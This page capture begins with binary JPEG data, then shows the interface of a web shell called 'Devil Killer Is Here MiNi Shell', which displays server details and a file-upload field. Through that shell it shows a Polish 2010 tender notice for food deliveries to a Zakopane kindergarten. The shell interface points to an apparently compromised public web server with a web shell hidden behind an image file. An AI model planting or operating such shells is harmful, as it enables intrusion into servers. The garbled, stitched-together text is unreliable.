JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/381784-N-2010.html

<p class="kh_header"><b>Zakopane: Sukcesywna dostawa artykułów żywnościowych na potrzeby   Przedszkola nr 9 w Zakopanem przy ul. Sabały 10</b><br>
<b>Numer ogłoszenia: 381784 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 9 , ul. Sabały 10, 34-500 Zakopane, woj. małopolskie, tel. 18 20 13 225, faks 18 20 13 225.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorzadowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów żywnościowych na potrzeby   Przedszkola nr 9 w Zakopanem przy ul. Sabały 10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.	Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą artykułów żywnościowych na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10

 Zakres zamówienia obejmuje : 
Zadanie nr 1 - Dostawa pieczywa

l.p.	Nazwa	jm	ilość
1.	Bułka hotelowa	szt.	1000
2.	Chleb krojony zwykły 0,60 kg	szt.	650
3.	Chleb pszenno żytni 0,60 kg	szt.	250
4.	Chleb graham  0,50 kg	szt.	250
5.	Chleb wieloziarnisty 0,50 kg	szt.	250
6.	Weka wrocławska   0,30 kg	szt.	610
7.	Rogal drożdżowy z dżemem 0,06 kg	szt.	1100
8.	Drożdżówka z masą budyn. 0,06 kg	szt.	770
9.	Pączek z różą 0,08 kg	szt.	660
10.	Babka drożdżowa foremka 0.50 kg	szt.	100
11.	Ciasto jogurtowe 0,40 kg	szt.	220
12.	Babka piaskowa 0,45kg	szt.	180

Zadanie nr 2 - Dostawa produktów spożywczych


l.p.	Nazwa	jm	ilość
1.	Ciasteczka maślane 160 g	szt.	150
2.	Cukier 1kg	kg	750
3.	Cukier puder 0,5 kg	kg	4
4.	Cukier waniliowy 32g	szt.	140
5.	Dżem słoik 300g typu Łowicz (mix)lub równoważny 	szt.	72
6.	Groszek konserwowy 400g 	szt.	80
7.	Herbata typu Saga 100 szt.(torebki) lub równoważny	szt.	10
8.	Herbata granulowana 100g	szt.	90
9.	Herbata owocowa malinowa typu  Vitax 40g lub równoważny	szt.	60
10.	Herbata typu Irwing 100g lub równoważny	szt.	32
11.	Ketchup 490g typu Helmans łagodny lub równoważny	szt.	52
12.	Chrzan typu Polan 350g lub równoważny	szt.	30
13.	Kukurydza 400g	szt.	120
14.	Szczaw konserwowy 	szt.	70
15.	Maggi 1l typu Knorr lub równoważny	szt.	50
16.	Musztarda łagodna 175 g	szt.	20
17.	Cytrynka 1 l	szt.	50
18.	Miód wielokwiatowy 400 g	szt.	50
19.	Fasolka szparagowa R 2,60 kg puszka	szt.	30
20.	Koperek konserwowy 180 g	szt.	50
21.	Przecier ogórkowy 350 g	szt.	80
22.	Ogórki konserwowe 420 g 	szt.	64
23.	Koktajl owocowy puszka 3035 g 	szt.	10
24.	Koncentrat  pomidorowy 30% 850 g	szt.	50
25.	Brzoskwinia puszka 2500 g 	szt.	10
26.	Ananas puszka 3035 g 	szt.	10
27.	Sól jodowana 1kg	kg	150
28.	Ziele angielskie 15g	szt.	25
29.	Nutella szklanka 230g lub równoważny	szt.	72
30.	Liść laurowy 7g	szt.	15
31.	Kminek mielony 25g	szt.	15
32.	Proszek do pieczenia 30g	szt.	30
33.	Vegeta typu Podrawka 1 kg lub równoważny	szt.	30
34.	Kwasek cytrynowy 20g	szt.	50
35.	Płatki czekoladowe kuleczki Nestle 500g	szt.	150
36.	Płatki Kangusie 500g lub równoważny	szt.	80
37.	Ryż 5 kg  typu Kamis lub równoważny	szt.	10
38.	Kasza manna 1kg	kg	32
39.	Bułka tarta 500g wrocławska lub równoważny	kg	60
40.	Kasza jęczmienna wiejska 1 kg	kg	60
41.	Kasza pęczak 1 kg	kg	22
42.	Ryż biały 1 kg	kg	60
43.	Mąka ziemniaczana 1kg	kg	10
44.	Galaretka owocowa typu Winiary 80 g wiśniowa lub równoważny	szt.	300
45.	Kisiel typu Winiary 77g żurawina , morela	szt.	300
46.	Budyń typu Winiary 60 g śmietankowy lub równoważny	szt.	180
47.	Kawa Inka 150g lub równoważny	szt.	110
48.	Kakao ciemne 200g	szt.	32
49.	Kakao rozpuszczalne 600g	szt.	78
50.	Biszkopty 140 g podłużne	szt.	320
51.	Czekolada w proszku1 kg	szt.	12
52.	Czekolada mleczna 100g	szt.	220
53.	Cukierki z galaretką 2,80 kg	szt.	12
54.	Bulion grzybowy typu Knorr 60 g lub równoważny	szt.	30

55.	Bulion cielęcy typu Knorr 160 g lub równoważny	szt.	50
56.	Delikt do mięsa typu Knorr 700 g lub równoważny	szt.	20

57.	Groszek ptysiowy 80 g 	szt.	180
58.	Płatki Cheerios 500 g lub równoważny	szt.	60
59.	Płatki kukurydziane 1 kg	szt.	80
60.	Cynamon 600 g	szt.	1
61.	Tuńczyk w oleju 1705 g	szt.	15
62.	Makrela w pomidorach 170 g	szt.	240
63.	Olej kujawski 3 l lub równoważny	szt.	96
64.	Oliwa z oliwek	szt.	15
65.	Pomidor puszka 2550 g	szt.	48
66.	Pieprz mielony 1 kg	szt.	1
67.	Pasztet podlaski 150 g lub równoważny	szt.	168
68.	Sok malinowy typu Herbapol 420 ml lub równoważny	szt.	36
69.	Sok pomarańczowy typu Tymbark 2 l lub równoważny	szt.	240

70.	Sok jabłkowy typu Tymbark 2 l lub równoważny	szt.	120
71.	Sok marchwiowo-jabłkowy 1l	szt.	192
72.	Sok pomarańczowy 200 ml	szt.	1080
73.	Sos do spaghetti typu Knorr 1 kg lub równoważny	szt.	10

74.	Sos myśliwski typu Winiary 33 g lub równoważny	szt.	120

75.	Sos owocowy 1 l	szt.	10
76.	Wafelki śmietankowe Skawa 20 g lub równoważny	szt.	1470

77.	Princessa mleczna  37 g lub równoważny	szt.	840

78.	Prince polo 36 g lub równoważny	szt.	770
79.	Wafelki Elitesse Skawa 20 g lub równoważny	szt.	600
80.	Woda mineralna Muszynianka niegaz. lub równoważny	szt.	900
81.	Zasmażka jasna typu Knorr 1 kg lub równoważny	szt.	4

82.	Bazylia 230 g	szt.	2
83.	Oregano 230 g	szt.	1
84.	Papryka czerwona słodka 0,5 kg	szt.	3
85.	Majeranek 230 g	szt.	2
86.	Koncentrat buraczany 300ml	szt.	60
87.	Przyprawa do ryb 800 g	szt.	1
88.	Makaron muszelkitypu Lubella 0,50 kg lub równoważny	szt.	120
89.	Makaron literki typu Kamis 0,50 kg lub równoważny	szt.	36

90.	Makaron świderki typu Lubella 0,50 lub równoważny	szt.	90

91.	Makaron łazanka typu Lubella 0,50 lub równoważny	szt.	84

92.	Makaron spaghetti typuLubella 0,50 kg lub równoważny	szt.	100

93.	Makaron kokardki typLubella 0,50 kg lub równoważny	szt.	60
94.	Makaron gwiazdki typ Lubella 0,50 kg lub równoważny	szt.	48

95.	Makaron nitka typu Czaniecki 0,25 kg lub równoważny	szt.	120

Zadanie nr 3 - Dostawa mięsa i podrobów, wyrobów wędliniarskich, drobiu, wyrobów drobiarskich

l.p.	Nazwa	jm	ilość
1.	Filet z indyka pieczony	kg	28
2.	Kiełbasa szynkowa	kg	28
3.	Kiełbasa podwawelska	kg	30
4.	Pasztet pieczony drobiowy	kg	35
5.	Polędwica drobiowa	kg	28
6.	Polędwica sopocka	kg	31
7.	Szynka konserwowa	kg	28
8.	Szynka gotowana 	kg	85
9.	Wędzonka krotoszyńska	kg	16
10.	Rozbef wołowy	kg	120
11.	Kiełbasa krakowska sucha	kg	30
12.	Parówka cienka Babuni	kg	60
13.	Kości wieprzowe 	kg	150
14.	Schab b/k	kg	200
15.	Szynka b/k surowa	kg	180
16.	Żołądki drobiowe	kg	60
17.	Wątroba drobiowa	kg	60
18.	Łopatka b/k	kg	80
19.	Karkówka b/k	kg	120
20.	Ogony 	kg	150
21.	Boczek b/k wędzony	kg	75
22.	Słonina	kg
	  22
23.	Szponder wołowy	kg	80
24.	Pieczeń wołowa	kg
	60
25.	Cielęcina -pieczeń	kg	60
26.	Filet z kurczaka	kg	160
27.	Kurczak świeży	kg	80
28.	Udka z kurczaka	kg	35
29.	Filet z indyka	kg	105


Zadanie nr 4 - Dostawa produktów mleczarskich

l.p.	Nazwa	jm	ilość
1.	Śmietana 36 %  l l	szt.	   50
2.	Mleko 2,5 %  	l	4100
3.	Masło 82%  0,20 kg	szt.	  750
4.	Twaróg tłusty 0,20	szt.	366
5.	Serek homogen. owocowy 150g mix	szt.	1020
6.	Ser żółty salami lub równoważny	kg	  45
7.	Ser żółty edamski lub równoważny	kg	40
8.
	Jogurt  typu Jogobella 150g lub równoważny	szt.

	660
  9.	Jogurt typu Danonek  50g lub równoważny	szt	880

10.	Serek topiony kremowy	kg	22

11.	Śmietana 18 % 380 g	szt	660
12.	Jogurt naturalny 370 g	szt	96
13.	Kefir 370 g	szt	72
14.	Deser typu Monte max 100g lub równoważny	szt	1020
15.	Margaryna mleczna 250 g	szt	320
16.	Margaryna Flora 250 g lub równoważny	szt	60

Zadanie nr 5 - Dostawa owoców i warzyw

l.p.	Nazwa	jm	ilość
1.	Banany	kg	500
2.	Buraki ćwikłowe	kg	315
3.	Cebula	kg	160
4.	Cytryny	kg	5
5.	Fasola Jaś	kg	25
6.	Groch łuszczony połówki	kg	25
7.	Gruszki	kg	200
8.	Jabłka deserowe	kg	640
9.	Jaja kurze I klasa	szt.	5700
10.	Kalafior	szt.	70
11.	Kapusta biała	szt.	150
12.	Kapusta czerwona	szt.	40
13.	Kapusta kwaszona	kg	140
14.	Mandarynki	kg	100
15.	Marchew	kg	500
16.	Ogórek kiszony	kg	70
17.	Ogórek świeży	kg	60
18.	Papryka świeża	kg	15
19.	Pieczarki	kg	60
20.	Pietruszka	kg	150
21.	Pomidor	kg	80
22.	Rzodkiewka	szt.	60
23.	Sałata zielona	szt.	80
24.	Seler	kg	130
25.	Szczypior	pęcz	160
26.	Śliwki	kg	60
27.	Ziemniaki	kg	6000
28.	Pietruszka natka 25g	szt.	400
29.	Por	szt.	260
30.	Koperek 25g	pęcz	340
31.	Kapusta pekińska	szt.
	100

32.	Czosnek	szt.
	140

33.	Rabarbar	kg
	40

34.	Truskawki 
	kg
	140

35.	Maliny
	kg
	120

36.	Kiwi
	szt.
	1100

37.	Mandarynki
	Kg
	120

38	Pomarańcza	kg	100

Zadanie nr 6 - Dostawa mrożonek

l.p.	Nazwa	jm	ilość
1.	Filet mintaj płaty Szater lub równoważne	kg	260
2.	Kalafior 450g	kg	50
3.	Truskawki mrożone 450 g	kg	26
4.	Mieszanka kompotowa 450 g	kg	250
5.	Mieszanka warzywna 450 g	kg	50
6.	Brokuły 	kg	65


         Zamawiający informuje ,że podane  powyżej ilości artykułów żywnościowych są  ilościami szacunkowymi i w trakcie realizacji zamówienia mogą ulec zmniejszeniu. Zamawiający będzie  płacił za faktycznie   zamówione ilości produktów po cenach jednostkowych podanych w ofercie. 

Miejscem dostawy jest magazyn żywnościowy  Przedszkola Nr 9 w Zakopanem ul. Sabały 10
Umowa będzie realizowana w oparciu o zamówienia częściowe, które będą składane telefonicznie lub pisemnie przesłane faxem zgodnie z faktycznymi potrzebami Zamawiającego, zgodnie z cenami jednostkowymi zaproponowanymi 
w ofercie wykonawcy z zastrzeżeniem,  że całkowita wartość umowy nie może przekroczyć wysokości posiadanych środków finansowych przeznaczonych na ten cel, podanych podczas otwarcia ofert. 
Dostawy  będą  realizowane  najpóźniej następnego dnia do godz. 8.00, licząc od daty złożenia, najpóźniej poprzedniego dnia do godz. 9.00, telefonicznie zamówienia  na poszczególne produkty z pakietów, o ile zamówienie nie zostanie złożone wcześniej, niż na jeden dzień przed żądaną dostawą i nie zostanie wyznaczony przez Zamawiającego konkretny termin realizacji dostawy.

W wyjątkowych sytuacjach mogą wystąpić zamówienia dodatkowe  realizowane w tym samym dniu. 

 Wykonawca podejmuje się również rozładunku towaru i przeniesienia go do magazynu żywnościowego w  Przedszkolu Nr 9 ul. Sabały 10 w Zakopanem 

Wykonawca zobowiązuje się każdorazowo przy dostawie załączyć świadectwo jakości dostarczanego przedmiotu umowy (atest) lub handlowy dokument identyfikacyjny.

Wykonawca zobowiązuje się dostarczać przedmiot umowy czystym środkiem transportu przystosowanym do przewozu przedmiotu umowy a w przypadku  przewozu mięsa i wędlin  pojazdem dopuszczonym do użytkowania  przez Państwową Inspekcję Handlową.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-3, 01.24.20.00-5, 15.89.60.00-5, 15.81.10.00-6, 15.80.00.00-6, 15.40.00.00-4, 15.30.00.00-1, 15.10.00.00-9, 15.11.20.00-6, 15.20.00.00-6, 15.33.11.70-9, 03.22.00.00-9, 15.22.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma do oferty załączyc wypelniony  druk  formularza zawierajacy ceny jednostkowe  artykułow żywnosciowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie: Cena jednostkowa danego produktu  może ulec zmianie w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT ,przy czym zmianie ulegnie wyłącznie cena  jednostkowa brutto, ceny  jednostkowe   netto pozostaną  bez zmian.
Przewiduje sie możliwość w sezonie na dane owoce i warzywa   z wystąpieniem do wykonawcy o obniżenie cen jednostkowych w stosunku do podanych w ofercie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 9 w Zakopanem 
ul. Sabały 10
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 13:00, miejsce: Przedszkole Nr 9 w Zakopanem 
Gabinet Dyrektora  
ul. Sabały 10
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywana potrzeby Przedszkola nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą pieczywa  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10

 Zakres zamówienia obejmuje : 
Zadanie nr 1 - Dostawa pieczywa

l.p.	Nazwa	jm	ilość
1.	Bułka hotelowa	szt.	1000
2.	Chleb krojony zwykły 0,60 kg	szt.	650
3.	Chleb pszenno żytni 0,60 kg	szt.	250
4.	Chleb graham  0,50 kg	szt.	250
5.	Chleb wieloziarnisty 0,50 kg	szt.	250
6.	Weka wrocławska   0,30 kg	szt.	610
7.	Rogal drożdżowy z dżemem 0,06 kg	szt.	1100
8.	Drożdżówka z masą budyn. 0,06 kg	szt.	770
9.	Pączek z różą 0,08 kg	szt.	660
10.	Babka drożdżowa foremka 0.50 kg	szt.	100
11.	Ciasto jogurtowe 0,40 kg	szt.	220
12.	Babka piaskowa 0,45kg	szt.	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa produktów spożywczych na potrzeby Przedszkola Nr 9 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup wraz z  sukcesywną  dostawą produktów spozywczych  na potrzeby Przedszkola nr 9 w Zakopanem z siedzibą przy ul. Sabały 10

 Zakres zamówienia obejmuje 
1.	Ciasteczka maślane 160 g	szt.	150
2.	Cukier 1kg	kg	750
3.	Cukier puder 0,5 kg	kg	4
4.	Cukier waniliowy 32g	szt.	140
5.	Dżem słoik 300g typu Łowicz (mix)lub równoważny 	szt.	72
6.	Groszek konserwowy 400g 	szt.	80
